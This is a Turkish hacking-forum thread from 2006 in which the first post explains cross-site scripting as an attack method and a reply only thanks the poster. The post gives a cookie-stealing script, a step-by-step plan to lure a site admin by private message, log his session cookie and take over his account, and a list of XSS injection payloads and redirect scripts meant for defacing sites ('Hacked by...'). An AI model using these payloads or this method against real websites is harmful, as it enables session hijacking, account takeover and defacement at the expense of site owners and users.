TeknoTR  

Geri Dön   TeknoTR > Bilgisayar > Teknik Destek
Üye Ol SSS Sxe indir Sosyal Gruplar Takvim Resim Galerisi Etiketler Bütün Forumları okunmuş kabul et

XSS nedir ?

Teknik Destek bölümünde XSS nedir ? konusu , XSS nedir ? xss sistemlerdeki script açıklarıdır... ARama Modullerinde , Profil Panellerinde haber modullerinde shutbox vs.. bulunur.. bu modullere ufak scriptler ekleyerek sitenin yönlenmesini ya da hata vermesini sağlarız.. örn : http://localhost/hedefdeneme/index.p...be hübele gibi devam edelim... Xss Hangi Sistemler Kullanılır.. ...

Cevapla
 
LinkBack Konu Seçenekleri
Eski 07-12-2006, 13:31   #1 (permalink)
Banlandı
 
Giriş: 13-06-2006
Yaş: 21
Mesajlar: 1.850
Rep Puanı: 250
Nemesis Rütbe Artı +1Nemesis Rütbe Artı +1Nemesis Rütbe Artı +1
Rep Gücü: 0
E-Güven: (0/0)

Cool XSS nedir ?


XSS nedir ?
xss sistemlerdeki script açıklarıdır...
ARama Modullerinde , Profil Panellerinde haber modullerinde shutbox vs.. bulunur..
bu modullere ufak scriptler ekleyerek sitenin yönlenmesini ya da hata vermesini sağlarız..
örn :
http://localhost/hedefdeneme/index.p...be hübele gibi
devam edelim...
Xss Hangi Sistemler Kullanılır..
Xss Genellikle Php-Nuke ya da Php ile yapılmış sistemlere kullanılır
ama Asp’de kullanılmaz anlamına gelmez..
Biraz daha örnekleyerek Anlatalım..
">nedirbu<"font%20size=20>Hacked by oturgaçlı götüreç%20:P</font>
basit bir arama scriptinde kullanılıcak açık..
Yukardaki Xss yi biraz daha açalım .
( $_POST / $_SESSION , $_GET ) Php de arama yaparken verdiğimiz komut budur..
Session’da $username adlı bir değişken var diyelim.Sayfada echo’landığı $_SESSION[’variable’] şeklinde ekrana basılmadığı zaman url üzerinde sayfa.php?username=XSS girdiğimizde oturumdaki kullanıcıyı değil adres satırından gelen variable’ı ekrana basacaktır.
ama xss den verimli sonuç alabilmek için scrtiptin içinde java script çalıştırmak gerekir...
Java Scripti Neden Çalıştırırız :
Cookie Çalmak İçin..
Örnekleyelim..
<script>document.location=’/xss/?’+escape(document.cookie)</script>
Adım Adım XSS için bir method anlatayım..
İlk Önce Sitemize Cookie Çalıcağımız Script Yazılır...
daha Sonra Belirlediğimiz sitenin adminine bir dikkat çekici bir pm atılarak Admin Bizim Belirlediğimiz Siteye Yönlendirilir..
admin’inin Bilgisayarındaki Cookie’inn ayınsından bizim belirtiğimiz adrestedi script tarafından log tutulur..
daha sonra bu cookie burdan alınır bizim bilgisayarımızdaki cookie ile değiştirilir..
taskmanager.exe yi (xp için) kapatılır ve sitenin adresini tekrar yazıp girdiğimizi zaman sitede ki Kullanıcı Adımız : Admin olduğunu tüm yetkilere sahip olduğumuzu görürüz..
Xss Komutları :

<IMG src= "">ascript:alert(’Hacked by ...’);">
<IMG SRC=javascript:alert(’XSS’)>
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

<IMG DYNsrc= "javascript alert Hacked by.."> <BR SIZE="&{alert(’Hacked by...)}">

<IMG src= "vbscript msgboxHacked by.."> <DIV STYLE="background-image: url(javascript:alert(’Hacked by...))">

Sisteme JavaScript Ekleyerek İstediğimiz sayfaya yönlendirmek te Diğer Bir Yöntemdir..
<script language="javascript">
self.location="gidilecek_sayfa.htm"
</script>
<script language="VBscript">
response.redirect""
</script>
<script>
window.location = "";
</script>
<script LANGUAGE="JavaScript">
<!-- Begin
function redirectPage() {
var url640x480 = "";
var url800x600 = "";
var url1024x768 ="";
if ((screen.width == 640) && (screen.height == 480))
window.location.href= url640x480;
else if ((screen.width == 800) && (screen.height == 600))
window.location.href= url800x600;
else if ((screen.width == 1024) && (screen.height == 76)
window.location.href= url1024x768;
else window.location.href= url640x480;
}
// End -->
</script>
<meta http-equiv="Refresh" content="1;URL=http://www.xxx.com/">
<script>
function sayfayi_yenile()
{self.location.refresh()}
self.setTimeOut(’sayfayi_yenile()’,5000)
</script>

<script>
window.setTimeout("location.reload()",10000);
</script>
<script>
location.reload();
</script>
Nemesis isimli üyemiz çevrimdışıdır. (Offline)  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Alıntı ile Cevapla
Eski 08-29-2006, 16:33   #2 (permalink)
Üye
 
TURKIYEM - ait Avatar
 
Giriş: 29-06-2006
Mesajlar: 298
Rep Puanı: 420
TURKIYEM Rütbe Artı +1TURKIYEM Rütbe Artı +1TURKIYEM Rütbe Artı +1TURKIYEM Rütbe Artı +1TURKIYEM Rütbe Artı +1
Rep Gücü: 31
E-Güven: (0/0)

Ce: XSS nedir ?


Eline sağlık paylaşımın için teşekkürler
__________________
http://img123.imageshack.us/img123/9...0f21a2fjr6.gif



UğrunaÖlmekseEğerSeniYaşatmak,BinDefaÖlürümdeAdına LekeSürdürmem.Gururdur,NamusturBAYRAKveSANCAK,aKsa daKanımKorkma;Haini GÜLDÜRMEM
TURKIYEM isimli üyemiz çevrimdışıdır. (Offline)  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Alıntı ile Cevapla
Cevapla

Konu Seçenekleri

Yetkileriniz
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-KodlarıKapalı
Trackbacks are Açık
Pingbacks are Açık
Refbacks are Açık
Gitmek istediğiniz klasörü seçiniz


Şu an saat 01:29 .
Tarih 08-30-2008


Powered by vBulletin Version 3.7.2
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd
Türkçe Çeviri : ach

eXTReMe Tracker


1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192